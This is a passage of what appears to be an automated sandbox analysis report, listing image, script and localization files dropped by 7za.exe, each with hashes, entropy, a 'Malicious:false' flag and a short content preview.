      Preview:.PNG........IHDR.......*............sRGB........DIDATH..=H.Q...=.X.S.`.-B....}..6.Ia..Ia.4.I..R,..BH..>.p.N4HH.....E......7....v.....03....y.....J...8}..}...L....W(....A..t:=..d.....[.l........AUGm.?y.7.~...H...._Pd..7.`...v..st {..Kb.c.h...)....$t.N.Z....l^...h;XD...:cz.%...?I.R...B..`..8U;I+/.B..../`..."%.w}.9.....uHZ.w...H\..\.m..)]l.....#...k.......;..:..b.+.....u@b.....5..Fy...$6...|~........e.TGMa.V.I.C.......-v...@....z.B+...e.....*..XB/"..".I..y..1........E.Qk.....c.q...K._..[....|...v o....Q.o.R..bW........x..h.U..l.u.....i.....>..8.{..l.6./U..?.X.....'u..DQ...&q...o.Dv..V..1..._......sQ......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 144 x 166, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):2174
      Entropy (8bit):7.783040751815851
      Encrypted:false
      SSDEEP:
      MD5:643C4F6DA687EC8788477BBEE59980B1
      SHA1:466C84BBDD6095C2059BCF689BA58C8C0AD852FE
      SHA-256:69821E018786736E8E827E90C4ACD35EB2C81E2845978678D7E365A67BBAB8F8
      SHA-512:4E931838A91FDBB330E854FBB331942E1C517968A55C7ED5A970E83AFBC83EFEA50275A2AA216F806B0CF3FFBB718C5944BEBA9647DF61BB90D1C5FAB12DF4F3
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............5e......sRGB........8IDATx..Oh.E..g...klZ...T.[..x(.T<{.......DP<..H$.....=.......'...Q..*....%6`....8.6...Nvf...7.....f~..]...V&C#J.?w...O..]...%.3B....uY.`... .....dc.8.....@4!..+...[e..898.V..W=..M...F.w.+....<......[.t.l.....@.....(ze....h.T.F.BP Z..@j3{..s..M...'G..I.uV(u...oc4.8.m.@.<8...%l....H7..K,.j/[....y)...k.j.[.%.j....b....2..q....01.D.....8D..A..d"@.Ldx."@. L.2..@&2<...@.&....].6e...Nv6.ja..P...y.ux.\....r9..\.\=.......\>.A....@..E?..E.@>..(...gS...........l......P.|...mu%..W.+.ZA...;..C..HlM..j..EbWV;_.G.w#...O.J.=.n;......}......5.3....".:o..cL1.x.+.s..P.`[[La......B..mm1.Q.b8.........F.....*.(...S..*.s..X].>3.....'.........:o..V..1 P..Y...t....~gJ..o.........q..P....:...q..P....:...q..P....:...q..P....:...q...^...F..%.#-....2.. qk1.h.D...L....D..|P.('....>J.@>.F...E.l..R .T#.I."j..R).....@.5.G.....r...O.../..L?.^G.}.IQ./e........f|l."g:.z..U`t.......R...T.#....N.'.?G..1....F.9m..u...........QI... .c.~
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1038
      Entropy (8bit):7.778657502228955
      Encrypted:false
      SSDEEP:
      MD5:53EE9B0946512B4DB66680AB146B6C18
      SHA1:B34BE2AB4E2BC053E77D912B23FAFCE7E886ABC7
      SHA-256:7DE42129A1C601264AC8632602E4D4BC7CC285F24D6FA58B1DB1CB78E54EF085
      SHA-512:C300B3565FF4249D779BD5E6AA0F5776DF2C776E64ABEF6E53A3F9D02FD6A2910E580231FF5B4F28A0D973326C92D3E3E8AAED9A75467295836C6F5A9839080B
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR... ... .....szz.....sRGB.........IDATX..KH.Q......Jb2$Q.[.m".,.A...ePH...j.QH.ia..H..aeP.R...:..%..E.%TD....8.~...o.WI.....{.......{..hH.9...^.....@ Ph4..9.q.o.:-.K{II.g.'...T.f...7....].9.H q....-.... _..8LM.S&.ioYYY_.B.......j..&K...d....q.-.f@v....@..Y$.....h.X4....t..=..6$..i.q|HOO.\TT..k.=....#KE...K|..e....l.gw.].b.Qd..<=.=..Uz..w\.Z..V..`xxx....0...wp.WJKK.!.r.9..-.q.Y..5(g.'.N '..%r%.....sss.Xo.a....`.VTT..a`` cvv6.`<6...n...l.....Q...l.A.+..q..].@.)..`wTVV..ds\..Zd.N.O...k.K788h#....tN..Qf$...t.Q...hyyy.A......(.Q...j8.v..'.CG.6..c..x...bv.....f.... .stM..d.T....6p&.....U...5.0*.I.L.....M@...]4C...H?....8TW;.}.:oWG.P(u W+.5.l@..S..d....c=..^#./:v;..h.....?...\.4l..H....t,_A0c*Fy.d...0,./...+............mrr2.z..._..k._.K.?.....^.......Mm.GF=........(X..X..u~...B.Fx.U....%....D..b.{me.aW..N...^,...M.\2r...r..v..Z....l.N..n.x<...d...R...t..B~..."........ .......I.......p!..+.R..p.....t.A.g..C.>.!..,.......w......G.a.HII
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):504
      Entropy (8bit):7.245485580174661
      Encrypted:false
      SSDEEP:
      MD5:64DA1F8EC29C09D48ADBA2A37EF9B54C
      SHA1:B4E32B887A29F1882D6527FEFF0576A9859711AA
      SHA-256:AF5C59638E4C08FD51304BC0B01E7097D29B195CCB653BAA7DDBEFFCB9374602
      SHA-512:808A18981AAC84A6AEFA9DB164276C7327144BA86E3FCFA14DADB0CA576D17799853830F472D8DD3550564F9C8BD5490938649AAC97C8D8CA90C4DA6702CB0A0
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR... ... .....szz.....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.paint.net 4.0.3..P...iIDATXG...@..}+...P...D.+.&..T.+.x:k.-i..... .{fh...G....z.4e"|?._...1..!S.....`.i...}.i...u...m.1...[,.\..@,..p]w...m..j.....1.Q=......'x<...z.o.,K..$./.i.....z..7..x.EQ0.0...A.........t....x..f..e.3.q|)...h..%.......9..3d.9..".2v.\..I...T.m@........8...-..o..A.q.E.b........>.o.3..t...b..n.....#:.0!.{L~..b..s..[@.............H...fff..I..;}..s.......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:GIF image data, version 89a, 35 x 35
      Category:dropped
      Size (bytes):34628
      Entropy (8bit):7.438322441198017
      Encrypted:false
      SSDEEP:
      MD5:5291AA2FD758035F8127031D06E01BC6
      SHA1:75639EF116832047F1D1724284F87DE70B02338E
      SHA-256:51D4766382139C80322F648E4992FF61DB56C38575FD433EA1386EB69AA1118D
      SHA-512:CF6776F9EF9950F294DEA403320AF07A565C92AFDC9683891FD03B7C53EEAEEFFF56554B0C439360326B1CC3CDDEE559933AFB29992722F61BB1AEA5F691CBEE
      Malicious:false
      Reputation:low
      Preview:GIF89a#.#.................................................................................................... !!!"""###$$$%%%&&&'''((()))***+++,,,---...///000111222333444555666777888999:::;;;<<<===>>>???@@@AAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTOW[KZaG]hD`n@bt<dy9g~5i.2j.,m.$p..r..t..v..w..y..y..z..z..{..{..{..{..{..{..{..{..{..{..{..|..~.............!..&..)..+..,..-..-..-..-...../..0..2..5..:..@..G..K..N..Q..R..S..T..U..U..U..W..Y..\..^..`..c..h..l..n..p..r..u..x..{..~........................................................................................................................................................................................................................................................................!..NETSCAPE2.0.....!.......,....#.#........H......*\....I...!6a..Utx1....i..0.H..M.....A....:.P..7n.-+.qbAl.`.....%.H;I[.....J;.......z*.W...U....[K....f.B...}..6!7a(.....a.i..a.h+..T.k.BU.a.K~"..+u..Q.(#..Jr.C
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 256 x 256, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):10649
      Entropy (8bit):7.926315002342311
      Encrypted:false
      SSDEEP:
      MD5:EFC65C6341DD19FCA1E4C8FDFB99EBBC
      SHA1:2B746239BB791D70BB473FE9D2AA1804F644535F
      SHA-256:CA96C5E899A168281A7251BCD68A823C5D2530BA5AFF346C807C9EAE9354A92A
      SHA-512:5FE71A381A334FDF4E1C0DB68F3B7E387C5294B77010443697A9361AFE60F0287F7FD5BFFE3C389CF099A5F311BE156857AD808E344863BA0BD59C72BDD0CDDB
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...............?1....pHYs...#...#.x.?v...6iCCPPhotoshop ICC profile..x...J.P.@...P+.qpx.((..`.-E...!...Ji.^^.~..[..w...QpP...@q...!........r...u.a.a.k.n:..|9...S.....n....$....+..y.;...|.*.L..n.. *@.B....0.~.A...:i.@<..^./@)...()..A|.f..|0..3.}.0ut..jI:Rg.S-..eI....<.e:.dr?...&........b..n:r.jY{..3.......Xz,ZA8T..*......x..oazR..+....V...../..O..ZOb... cHRM..z%..............R....X..:....o.Z....'.IDATx..y\SW..O...cd...R.t..!.V.b..G.-3m.....y?c;..V.uJ...`.N.."..J.............$..Q..9...n.....pr......,.y..L&C.0U..%........0.........`................0.........`................0.........`................0.........`...........\.}#.H.".X ..........}}.........y..!....Ec0.B.VV...im..a..2mm9NNV...........=4(..s......^>....in...dR.....n..b..i..a..a..e......`.g.T....Y[+...........Xvv.<......g..C.C......E......rAE.XL.N-...........vt.....u......k-..45Q.T...gO.3....n..@+.zz.EE..].nh0.....>g.Gt4...n%.@...L.Q^.TP.v..L"1..`........J.....p...6^.T..'....q..}...
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):511
      Entropy (8bit):7.3048492246736
      Encrypted:false
      SSDEEP:
      MD5:406AF79D2AF4AB6E499F4F9ED91866E0
      SHA1:32B6EBA48467BE0EA1D805E4AAEBEFDF0D6BE5FE
      SHA-256:3DD57E66F1188493B4CFC3D6D23B0C71A77C86CF49583261212FF77AA9BAC07F
      SHA-512:4E0CC83CA87BCF3D3139D99947846206634E4AD9B68731892719DE9FEA0E5308167A8D377F95ED399DAA916064EC17D9DE0ADDAEC8BE817E7985BEF81B360240
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR... ... .....szz.....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.paint.net 4.0.3..P...pIDATXG...0..}.Z.....!.b.......(........].].@.9M......P...t.].>t}H.D. ..C..d...f.(..\..z.T,.c........*2....-.}.....FZ..t:...z*6.......v;...*....lf..n.x<.z..........L.S.....n...EQ$.v..@.!3...).^.V..y...9..=..0j...3.^.V.G........\).oJ...>..Y........c..).....W.. 83.#cZ@.,.dY...!F..........(...v....x.l.%....p....<\)..Ef...de....".\..*N...........h..o.#aI..F....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text
      Category:dropped
      Size (bytes):94959
      Entropy (8bit):5.387514216869588
      Encrypted:false
      SSDEEP:
      MD5:F42CDB66699B271D702D1370E915C394
      SHA1:343812F72C0830689EEAE67BA66C3C0FCE5CF7BD
      SHA-256:90DD37BF7A38EE7B3BF5E3C0B3350B5DAAB3F0F544ECA7E52FBF3059D416F8D3
      SHA-512:9A647B6595ADAF5080D0FA14C8998315D0B0FEB54091DCE793D342A3D9443A1F017BFBBE5D896608012B182E52CA05C3A344A2CDBC684AA9422F9D5C6B607270
      Malicious:false
      Reputation:low
      Preview:try {. var geoip = {. geoip_area_code: "",. geoip_city: "",. geoip_city_continent_code: "",. geoip_city_country_code: "",. geoip_city_country_code3: "",. geoip_city_country_name: "",. geoip_country_code: "",. geoip_country_code3: "",. geoip_country_name: "",. geoip_dma_code: "",. geoip_latitude: "",. geoip_longitude: "",. geoip_org: "",. geoip_postal_code: "",. geoip_region: "",. geoip_region_name: "". };. window.geoip = geoip;.} catch (err) {. window.geoip = {};.}..try {. window.modelData = window.diagnostics.getModel();.} catch (err) {. window.modelData = {type: 'unknown', vendor: 'unknown'};.}..var softRandomSeed = Math.random();.var usaLocales = [. 'US',. 'CA'.];.var euLocales = [. 'AT',. 'BE',. 'BG',. 'CZ',. 'DE',. 'DK',. 'EE',. 'ES',. 'FI',. 'FR',. 'GB',. 'GR',. 'HR',. 'HU',. 'I
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (467)
      Category:dropped
      Size (bytes):115309
      Entropy (8bit):5.10677994226687
      Encrypted:false
      SSDEEP:
      MD5:5353E81927850A338EEC040F48DBF28D
      SHA1:5EE3DC21BD649DD961E837487F4C24FE42E669AA
      SHA-256:F113501C715D1BFF425437975CA4831151E84230ACC6CFE96428E56B78E35467
      SHA-512:CAF7DABB22F60F71E9EB9A71B00F06120C4370C4F9B26B63304892C00BE6B7D997038FCB38D6F6493050A36916B3B6E2B95BC82C18C9D05F5551384119B534AE
      Malicious:false
      Reputation:low
      Preview:window.languages["ar"] = {. plural: function (n) { return Number(n==0 ? 0 : n==1 ? 1 : n==2 ? 2 : n%100>=3 && n%100<=10 ? 3 : n%100>=11 && n%100<=99 ? 4 : 5) },. "deviceclasses_bluetooth-single-main": ".... Bluetooth",. "deviceclasses_bluetooth-single-for": ".... Bluetooth",. "deviceclasses_bluetooth-plural-main": "..... Bluetooth",. "deviceclasses_bluetooth-plural-for": "..... Bluetooth",. "deviceclasses_cardreader-single-main": ".... .......",. "deviceclasses_cardreader-single-for": ".... .......",. "deviceclasses_cardreader-plural-main": "..... ........",. "deviceclasses_cardreader-plural-for": "..... ........",. "deviceclasses_chipset-single-main": ".......",. "deviceclasses_chipset-single-for": ".......",. "deviceclasses_chipset-plural-main": ".......",. "deviceclasses_chipset-plural-for": ".......",. "deviceclasses_inputdev-single-main": ".... .......",. "device
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (558)
      Category:dropped
      Size (bytes):112824
      Entropy (8bit):5.532508673758325
      Encrypted:false
      SSDEEP:
      MD5:3B1CD522A874840B63297B4E2BD5EC93
      SHA1:1E3C5669DDBB851341A9AFD30E20034569A3D379
      SHA-256:6D04C383F24992C7014114BE087709C7BEBD0F62240E8A1CEB31E28E21BFB372
      SHA-512:57E121649DEF49FFC9B2C3870BF791F6CE1D9404F343BBF8BF615BB1A8EBC2DEC91A3CFFFB49502C179BED8FC50D2E2C241E2233D2B312B5991257133E5070F9
      Malicious:false
      Reputation:low
      Preview:window.languages["az"] = {. plural: function (n) { return Number((n != 1)) },. "deviceclasses_bluetooth-single-main": "Bluetooth cihaz.",. "deviceclasses_bluetooth-single-for": "Bluetooth cihaz.",. "deviceclasses_bluetooth-plural-main": "Bluetooth cihazlar.",. "deviceclasses_bluetooth-plural-for": "Bluetooth cihazlar.",. "deviceclasses_cardreader-single-main": "kart oxuyucu",. "deviceclasses_cardreader-single-for": "kart oxuyucu",. "deviceclasses_cardreader-plural-main": "kart oxuyucular",. "deviceclasses_cardreader-plural-for": "kart oxuyucular",. "deviceclasses_chipset-single-main": ".ipset",. "deviceclasses_chipset-single-for": ".ipset",. "deviceclasses_chipset-plural-main": ".ipsetl.r",. "deviceclasses_chipset-plural-for": ".ipsetl.r",. "deviceclasses_inputdev-single-main": "daxiletm. qur.usu",. "deviceclasses_inputdev-single-for": "daxiletm. qur.usu",. "deviceclasses_inputdev-plural-main": "daxiletm. qur.ular.",. "deviceclasses_inputdev-plural-for
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):111031
      Entropy (8bit):5.380800971445646
      Encrypted:false
      SSDEEP:
      MD5:B62055A067B2A47AD1BCEB2F4D56D563
      SHA1:DAA9ED97806CD571B2FB0D59583FF60C185CA399
      SHA-256:1E8907789657B28EF2FFBDD30BD214CDD429E8F7D06D86DFEA3923F08DAFA539
      SHA-512:3EFF16C7F2B03777225F6AF80F3BAE4ED9C528C92B41EA4FA59A58B22BBE2C8711D19134BCE5F0A2187F1AD5E32A9F4C037FC4EB54DCF69456BB0D64AA21B1A3
      Malicious:false
      Reputation:low
      Preview:window.languages["be"] = {. plural: function (n) { return Number((n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<12 || n%100>14) ? 1 : n%10==0 || (n%10>=5 && n%10<=9) || (n%100>=11 && n%100<=14)? 2 : 3)) },. "deviceclasses_bluetooth-single-main": "....... Bluetooth",. "deviceclasses_bluetooth-single-for": "....... Bluetooth",. "deviceclasses_bluetooth-plural-main": "....... Bluetooth",. "deviceclasses_bluetooth-plural-for": "...... Bluetooth",. "deviceclasses_cardreader-single-main": ".........",. "deviceclasses_cardreader-single-for": "..........",. "deviceclasses_cardreader-plural-main": "..........",. "deviceclasses_cardreader-plural-for": "...........",. "deviceclasses_chipset-single-main": "......",. "deviceclasses_chipset-single-for": ".......",. "deviceclasses_chipset-plural-main": ".......",. "deviceclasses_chipset-plural-for": "........",. "deviceclasses_inputd
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):109915
      Entropy (8bit):5.3280465710114395
      Encrypted:false
      SSDEEP:
      MD5:F028919CF3C22D7E5179F9CE83C5C05E
      SHA1:11ABEEF839C25A4516E3697553460F45FF0CC48E
      SHA-256:E531D3B2B28191C33A0BE2E421615375B084B6961011F73B06F10972DD5D2EEE
      SHA-512:7ACE94A4DFDAD1CE5B4942BCA480071F4860721362FAAAE8E6B57A4F8924E98D4B2646634B94196498CACFD16810061638879C88FFFB3BE5B3CC50468EF33376
      Malicious:false
      Reputation:low
      Preview:window.languages["bg"] = {. plural: function (n) { return Number((n != 1)) },. "deviceclasses_bluetooth-single-main": "Bluetooth ..........",. "deviceclasses_bluetooth-single-for": "Bluetooth ..........",. "deviceclasses_bluetooth-plural-main": "Bluetooth ..........",. "deviceclasses_bluetooth-plural-for": "Bluetooth ..........",. "deviceclasses_cardreader-single-main": "..... ........",. "deviceclasses_cardreader-single-for": "..... ........",. "deviceclasses_cardreader-plural-main": "...... ........",. "deviceclasses_cardreader-plural-for": "...... ........",. "deviceclasses_chipset-single-main": "......",. "deviceclasses_chipset-single-for": "......",. "deviceclasses_chipset-plural-main": ".......",. "deviceclasses_chipset-plural-for": ".......",. "deviceclasses_inputdev-single-main": "...... ..........",. "deviceclasses_inputdev-sing
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):122768
      Entropy (8bit):5.162117046244263
      Encrypted:false
      SSDEEP:
      MD5:C30F4AF5FFB5FFA1B88EDA6080EB01CA
      SHA1:1519C3229BCE37E7A49707A5CA3E7B19DE8AD21E
      SHA-256:4842D33A9A0828F60B2E615696F1D593C9D20458A4F85987275824F164F4ABB6
      SHA-512:078E68F55D9AA07DD53283FC25A1013B129D76DFA5EFCB8DE5EE531C4182D860ECC2A5A07EF756D2BAA4DFD7AA645D7A95F2A1464E24550371CC0FB18142BBCC
      Malicious:false
      Reputation:low
      Preview:window.languages["bn"] = {. plural: function (n) { return Number((n != 1)) },. "deviceclasses_bluetooth-single-main": "....... ......",. "deviceclasses_bluetooth-single-for": "....... ......",. "deviceclasses_bluetooth-plural-main": "....... ..........",. "deviceclasses_bluetooth-plural-for": "....... ..........",. "deviceclasses_cardreader-single-main": "..... .....",. "deviceclasses_cardreader-single-for": "..... .....",. "deviceclasses_cardreader-plural-main": "..... .........",. "deviceclasses_cardreader-plural-for": "..... .........",. "deviceclasses_chipset-single-main": "......",. "deviceclasses_chipset-single-for": "......",. "deviceclasses_chipset-plural-main": "..........",. "deviceclasses_chipset-plural-for
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):92125
      Entropy (8bit):4.881200167468137
      Encrypted:false
      SSDEEP:
      MD5:44297EB6AB2780AC58F81790EA306713
      SHA1:8671E6FB97A659F853BDB42F1043903AEB47E306
      SHA-256:2E7CD6BD1AEC7341ADFC05787E08E437F6F0C55721D9633EB6C234AFF106552B
      SHA-512:C6EDDC70D14152A1EEB864769D44B029F2AF306231B0C14B11EA4417C2EEE84AF1AFA7240F402CD6D42B2338E0D9DE5CF890DD8989C090AFAC7B1FDF29E651A5
      Malicious:false
      Reputation:low
      Preview:window.languages["ca"] = {. plural: function (n) { return Number((n != 1)) },. "deviceclasses_bluetooth-single-main": "dispositiu Bluetooth",. "deviceclasses_bluetooth-single-for": "dispositiu Bluetooth",. "deviceclasses_bluetooth-plural-main": "dispositius Bluetooth",. "deviceclasses_bluetooth-plural-for": "dispositius Bluetooth",. "deviceclasses_cardreader-single-main": "lector de.targetes",. "deviceclasses_cardreader-single-for": "lector de.targetes",. "deviceclasses_cardreader-plural-main": "lectors de.targetes",. "deviceclasses_cardreader-plural-for": "lectors de.targetes",. "deviceclasses_chipset-single-main": "chipset",. "deviceclasses_chipset-single-for": "chipset",. "deviceclasses_chipset-plural-main": "chipsets",. "deviceclasses_chipset-plural-for": "chipsets",. "deviceclasses_inputdev-single-main": "dispositiu d.entrada",. "deviceclasses_inputdev-single-for": "dispositiu d.entrada",. "deviceclasses_inputdev-plural-main": "dispositius d.entrada",. "
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):88532
      Entropy (8bit):4.972579656427325
      Encrypted:false
      SSDEEP:
      MD5:31FEFFB5D719E8A9C926CA433CFA3F1D
      SHA1:B0F7115B06E1216A8FAFA8D4E0BCE2B57F7FB488
      SHA-256:E3D3A09CAB17E9FC5AAB91EB9E558FE7E91D0324E47D7FEE33BEF3BC784D1C16
      SHA-512:B7311DBA27BD8BACDA486497661BA3E3D7BD99D70CEA6E5425DBD6C2A87B9155B39515961203F0A7F87EC3C6970A0520E10177B1B43DE0EEE4DE1D8A8AE634D3
      Malicious:false
      Reputation:low
      Preview:window.languages["cs"] = {. plural: function (n) { return Number((n == 1 && n % 1 == 0) ? 0 : (n >= 2 && n <= 4 && n % 1 == 0) ? 1: (n % 1 != 0 ) ? 2 : 3) },. "deviceclasses_bluetooth-single-main": "Za..zen. Bluetooth",. "deviceclasses_bluetooth-single-for": "Za..zen. Bluetooth",. "deviceclasses_bluetooth-plural-main": "Za..zen. Bluetooth",. "deviceclasses_bluetooth-plural-for": "Za..zen. Bluetooth",. "deviceclasses_cardreader-single-main": ".te.ka karet",. "deviceclasses_cardreader-single-for": ".te.ka karet",. "deviceclasses_cardreader-plural-main": ".te.ky karet",. "deviceclasses_cardreader-plural-for": ".te.ky karet",. "deviceclasses_chipset-single-main": ".ipset",. "deviceclasses_chipset-single-for": ".ipset",. "deviceclasses_chipset-plural-main": ".ipsety",. "deviceclasses_chipset-plural-for": ".ipsety",. "deviceclasses_inputdev-single-main": "vstupn. za..zen.",. "deviceclasses_inputdev-single-for": "vstupn. za..zen.",. "deviceclass
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):91039
      Entropy (8bit):4.875490780188437
      Encrypted:false
      SSDEEP:
      MD5:C8FADBDEEE53990EC8F706A57C26AAE2
      SHA1:768DB1EAE7E0EFF4D93D12B766D704A6EB50A29E
      SHA-256:658A6691988D8C7D9A6683468943E0AB4F0E7B18BB89F797D59C1E2EC4F4106F
      SHA-512:5708C9152CE6F3586075DFB1C3D199413955142C7C0DDBA20804493E2AE05E2C4E18E9B54A71EB1D04D5D6D098ECC7AA5803A71FA5155D931BBB01712CA9890C
      Malicious:false
      Reputation:low
      Preview:window.languages["de"] = {. plural: function (n) { return Number((n != 1)) },. "deviceclasses_bluetooth-single-main": "Bluetooth-Ger.t",. "deviceclasses_bluetooth-single-for": "Bluetooth-Ger.t",. "deviceclasses_bluetooth-plural-main": "Bluetooth-Ger.te",. "deviceclasses_bluetooth-plural-for": "Bluetooth-Ger.te",. "deviceclasses_cardreader-single-main": "Kartenleser",. "deviceclasses_cardreader-single-for": "Kartenleser",. "deviceclasses_cardreader-plural-main": "Kartenleser",. "deviceclasses_cardreader-plural-for": "Kartenleser",. "deviceclasses_chipset-single-main": "Chipsatz",. "deviceclasses_chipset-single-for": "Chipsatz",. "deviceclasses_chipset-plural-main": "Chips.tze",. "deviceclasses_chipset-plural-for": "Chips.tze",. "deviceclasses_inputdev-single-main": "Eingabeger.t",. "deviceclasses_inputdev-single-for": "Eingabeger.t",. "deviceclasses_inputdev-plural-main": "Eingabeger.te",. "deviceclasses_inputdev-plural-for": "Eingabeger.te",. "deviceclasses_
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):96460
      Entropy (8bit):5.255595671484783
      Encrypted:false
      SSDEEP:
      MD5:B34AC2C7AFD1C719E6BDC3F27CAD343D
      SHA1:D94E0582F8E90EE8F3F39F426D7B298199194746
      SHA-256:40B9147CACA5587A2CE3FEA1DBE072520660B4E60B68FA34BB66081E93CB98D5
      SHA-512:C573BD5E043C1F649412B0994DEE236642B42D34ADD6BC39FD7640FC625856BB7F43DBD280D2CAE871AAC98DB4D212D364BFCFE352D04FCE91B1798B62C9C8E1
      Malicious:false
      Reputation:low
      Preview:window.languages["el"] = {. plural: function (n) { return Number((n != 1)) },. "deviceclasses_bluetooth-single-main": "....... Bluetooth",. "deviceclasses_bluetooth-single-for": "....... Bluetooth",. "deviceclasses_bluetooth-plural-main": "........ Bluetooth",. "deviceclasses_bluetooth-plural-for": "........ Bluetooth",. "deviceclasses_cardreader-single-main": ".......... ......",. "deviceclasses_cardreader-single-for": ".......... ......",. "deviceclasses_cardreader-plural-main": ".......... ......",. "deviceclasses_cardreader-plural-for": ".......... ......",. "deviceclasses_chipset-single-main": "chipset",. "deviceclasses_chipset-single-for": "chipset",. "deviceclasses_chipset-plural-main": "chipsets",. "deviceclasses_chipset-plural-for": "chipsets",. "deviceclasses_inputdev-single-main": "....... .......",. "deviceclasses_inputdev-single-for": "....... .
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):88160
      Entropy (8bit):4.813862419515703
      Encrypted:false
      SSDEEP:
      MD5:7507C4174CED52A6C0E1B2BB12CE9F3E
      SHA1:6BAD4EF261E7B7AB1A02D46341BD1F8A922987DA
      SHA-256:A3DF7C1B150504FB96555D8D7F7B9C4129A3225BA241DA983D56A9C7A1404AEC
      SHA-512:D13D045BD66BBF104EC533903E4B7BB76DD56F6A1C8346787F419BF1CD0EAFC082E757E0C244024D778755C4AB4468DA455F2F92FAD7F5FDB7A0135C9C6E26CF
      Malicious:false
      Reputation:low
      Preview:window.languages["en"] = {. plural: function (n) { return Number((n != 1)) },. "deviceclasses_bluetooth-single-main": "Bluetooth device",. "deviceclasses_bluetooth-single-for": "Bluetooth device",. "deviceclasses_bluetooth-plural-main": "Bluetooth devices",. "deviceclasses_bluetooth-plural-for": "Bluetooth devices",. "deviceclasses_cardreader-single-main": "card reader",. "deviceclasses_cardreader-single-for": "card reader",. "deviceclasses_cardreader-plural-main": "card readers",. "deviceclasses_cardreader-plural-for": "card readers",. "deviceclasses_chipset-single-main": "chipset",. "deviceclasses_chipset-single-for": "chipset",. "deviceclasses_chipset-plural-main": "chipsets",. "deviceclasses_chipset-plural-for": "chipsets",. "deviceclasses_inputdev-single-main": "input device",. "deviceclasses_inputdev-single-for": "input device",. "deviceclasses_inputdev-plural-main": "input devices",. "deviceclasses_inputdev-plural-for": "input devices",. "deviceclasses_lan-sing
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):93529
      Entropy (8bit):4.851559426647574
      Encrypted:false
      SSDEEP:
      MD5:76498F81A1AAC04CCF6BA07873CFCF1B
      SHA1:54E23785A26269CF9AD7354C3A501BA262CAE2C1
      SHA-256:04AA805CE029E962C28212533A3047E72D781097D77E6A119356E2DC400D1F0C
      SHA-512:F803170508D7CDAF6637B340140EC61FF756B86840829A2BD73CFF22329126E2615B54E91F53E2282274A4702A6B658D9DC3117ED54782EDCC35F440D7E1D0B8
      Malicious:false
      Reputation:low
      Preview:window.languages["es-419"] = {. plural: function (n) { return Number((n != 1)) },. "deviceclasses_bluetooth-single-main": "Dispositivo Bluetooth",. "deviceclasses_bluetooth-single-for": "Dispositivo Bluetooth",. "deviceclasses_bluetooth-plural-main": "Dispositivos Bluetooth",. "deviceclasses_bluetooth-plural-for": "Dispositivos Bluetooth",. "deviceclasses_cardreader-single-main": "Lector de.Tarjeta",. "deviceclasses_cardreader-single-for": "Lector de.Tarjeta",. "deviceclasses_cardreader-plural-main": "Lector de.Tarjetas",. "deviceclasses_cardreader-plural-for": "Lector de.Tarjetas",. "deviceclasses_chipset-single-main": "Conjunto de.Circuitos Electr.nicos principales",. "deviceclasses_chipset-single-for": "Circuito Integrado",. "deviceclasses_chipset-plural-main": "Circuitos Integrados",. "deviceclasses_chipset-plural-for": "Circuitos Integrados",. "deviceclasses_inputdev-single-main": "Dispositivo de.Entrada",. "deviceclasses_inputdev-single-for": "Dispositivo de
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):91601
      Entropy (8bit):4.848710556792903
      Encrypted:false
      SSDEEP:
      MD5:6854B126932FDA9990B0CE9B66C24335
      SHA1:7678C68F4B37BE942E16E9D8494DA27AC6A413FF
